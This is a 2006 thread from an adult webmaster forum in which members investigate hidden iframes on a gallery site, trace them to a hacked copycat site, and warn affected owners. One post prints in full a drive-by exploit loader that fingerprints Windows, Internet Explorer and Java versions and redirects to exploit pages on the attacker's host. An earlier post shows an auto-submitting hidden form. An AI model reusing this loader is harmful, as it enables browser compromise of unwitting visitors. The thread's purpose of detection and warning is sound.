GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Pichunter - Clever seo ? or ? (https://gfy.com/showthread.php?t=671171)

SmokeyTheBear 10-28-2006 01:21 AM
Pichunter - Clever seo ? or ?
 
go to pichunter.com , notice at the very bottom theres a hidden 0x0 iframe pointing to http://seekmat.com/my.php?iframe=1

pointing to wierd pages like http://colombia.seekmat.com/ is that some sort of seo work or did pichunter get hacked



also is this pichunters site wxw.dougansss.com/tgp/ ( DO NOT VISIT - VIRUS ON PAGE )

all the images are hotlinked from pichunter which isnt so strange but all the ref codes appear to also be pichunters ref codes , nastydollars , tcg bangrbros realitycash and that seems strange to just give all the traffic away to pichunter and make him free money while infecting people with an unknown virus

Tempest 10-28-2006 02:08 AM
I didn't get an iframe on the page that loaded for me.

Daruma 10-28-2006 02:11 AM
nothing for me on mac ;)

martinsc 10-28-2006 02:12 AM
i don't get it...

do people really think that hidden content is still helping them with the SE's?

Daruma 10-28-2006 02:12 AM
extremeeeem
delay


on mac



autocad????????????

2HousePlague 10-28-2006 03:56 AM
State of the Art, yo.

2hp

borked 10-28-2006 04:16 AM
no iframe on my FF on a Mac -
seekmat.com/my.php?iframe=1 is weird though - just random form post actions...
eg:
Code:
<html>
<form name="x" method="post" action="http://invicta.bfind.info/search.php?q=invicta 9937">
<input type="hidden" name="guest" value="1">
</form>
<script>
x.submit();
</script>
</html>
where the action="" changes randomly upon reload...

borked 10-28-2006 04:20 AM
my guess is random searches for a pay per search programme or something.... so every visitor generates a hidden search which earns him .0000001cent or something.

DarkJedi 10-28-2006 04:23 AM
Black SEO doorway pages. Nothing clever about them though.

Matt 26z 10-28-2006 05:41 AM
Just a guess here... Using the PicHunter domain to increase the pagerank of those SE pages, and then doing a redirect once they get picked up?

Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol

Jakke PNG 10-28-2006 06:04 AM
Quote:
Originally Posted by Matt 26z (Post 11174000)
Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol
It's actually pretty nice to know SOMEONE looks at shady shit. I know I don't have time. :)

SmokeyTheBear 10-28-2006 07:57 AM
Quote:
Originally Posted by Matt 26z (Post 11174000)
Just a guess here... Using the PicHunter domain to increase the pagerank of those SE pages, and then doing a redirect once they get picked up?

Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol
someone asked me to check out their tgp because they suspected something in the code causing a skim ofg traffic to cgi-dnsl.com that turns out to be dougansss.com that is just a copy of pichunter including the hidden iframes on both sites . turns out he was right .

DjSap 10-28-2006 08:01 AM
i would hope that the owner is smart enough to fuck with se's, since he has an established site and not a new one...

rhizome 10-28-2006 08:40 AM
dougansss.com is responsible for the TM3 hacks. He also totally fucked up my server forcing me to get a new one.

the Shemp 10-28-2006 12:30 PM
bump....

vcup 10-28-2006 12:33 PM
how do i get on pichunter?

RRRED 10-28-2006 12:37 PM
I don't get it...

emthree 10-28-2006 12:39 PM
SEO IMG Spam?

fris 10-28-2006 12:40 PM
i doubt pichunter is a part of that.

jacked 10-28-2006 12:42 PM
seems pretty sketchie to me...

free4porn 10-28-2006 12:51 PM
does sound strange to me

polle54 10-28-2006 12:56 PM
well

the iframe on wxw.dougansss.com/tgp/ is definately exploits....

this is the exploit code....
wxw.dougansss.com/dar/loading.html
and it explains why I wasn't hit by it when I entered, it's only IE they target...

Code:
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">
 var ExploitNumber=0;
 var Bug_param="";

 function GetVersion(CLSID)
  {
            if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
              {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
            else
              {return Array(0,0,0,0);}
  }

 function Get_Win_Version(IE_vers)
  {
    if (IE_vers.indexOf('Windows 95') != -1) return "95"
    else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
    else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
    else if (IE_vers.indexOf('Windows 98') != -1) return "98"
    else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
    else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
    else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
  }
 
 var CGI_Script="http://wxw.dougansss.com/dar/";
 if (navigator.appName=="Microsoft Internet Explorer")
  {
   
      var IEversion=navigator.appVersion;
      var IEplatform=navigator.platform;
      if (IEplatform.search("Win32") != -1)
      {
        var WinOS=Get_Win_Version(IEversion);
        FullVersion=clientInformation.appMinorVersion;
        PatchList=FullVersion.split(";");
               
        var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");
        var IE_vers  = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
       
        var XP_SP2_patched=0;
         
        switch (WinOS)
        {
            case "2K":
                      if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                      {  ExploitNumber=1;  }   
                      else                                // if JVM = 5.0.3810.0 or higher
                      {
                        if (IE_vers[0]==6)
                        {  ExploitNumber=3; }
                        else
                        {  ExploitNumber=2; }
                      }
                     
                      break;
            case "2K3":
                      ExploitNumber=3; 
                      break;           
            case "XP":
                                                               
                            if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                            {  ExploitNumber=1;  }   
                            else                                // if JVM = 5.0.3810.0 or higher
                            {
                              for (var i=0; i < PatchList.length; i++)
                              { 
                                  if (PatchList[i]=="SP2")
                                  {  XP_SP2_patched=1; }
                               
                              }
                              if (XP_SP2_patched==0)
                              {
                                  ExploitNumber=3; 
                              }
                              else
                              {
                                  ExploitNumber=4; 
                              }
                            }
                      break;         
            default: 
                      if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                      {  ExploitNumber=1;  }           
                      else
                      {  ExploitNumber=2;  }            // if JVM = 5.0.3810.0 or higher
                   
                      break;       
        }
        // launching exploit which number is depends on Windows and IE versions
             
        switch (ExploitNumber)
        {
            case  1:
                                        // 95, NT, ME, 98, 2k, XP
                      Bug_param=Bug_param+"e1/e1.html";
                      break;
            case  2:
                                        // 95, NT, ME, 98, 2k - if JVM = 5.0.3810.0 or higher
                      Bug_param=Bug_param+"e2/e2.html";
                      break;
            case  3:
                                        // 2k+IE6, 2K3, XP+SP1 - if JVM = 5.0.3810.0 or higher
                      Bug_param=Bug_param+"e3/e3.html";
                      break;
            default:
                      break;                 
          }
      }
  }

if (Bug_param != ''){
        window.location=CGI_Script+Bug_param;
}
it's not like they are trying to hide it's a exploit LOL

polle54 10-28-2006 01:06 PM
and another thing

the reason they have all the same ref's and things are because they stole all the gallery links and thumbs.. the easiest way to maintain a CJ site...
I don't think it's illigal since all the content is third party and submitted to all kind of sites...

I highly doubt that pichunter has anything to do with this site.

They probably send 0% to the content and the traffic probably comes from varius hacks and maybe trading in the dark area of this industry

gotys 10-30-2006 12:30 PM
Well am I glad I got this 2 days late :( Someone appereantly hacked us. You guys need to ICQ me when you find something like this, please!

Thank you for pointing it out at least here though

SmokeyTheBear 10-30-2006 12:55 PM
Quote:
Originally Posted by gotys (Post 11192180)
Well am I glad I got this 2 days late :( Someone appereantly hacked us. You guys need to ICQ me when you find something like this, please!

Thank you for pointing it out at least here though
sorry i didnt have any contact info or i would have.. figured gfy word of mouth usually travels fastest

bp4l-xp 12-15-2006 11:56 AM
sorry to bump this one but
we also have been hacked by this motherfucker
he is a russian guy
russian business network (his host) doesn't give a fuck about my ABUSE mail.

be careful, change your passwords and protect your scripts with passwords!


All times are GMT -7. The time now is 01:39 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123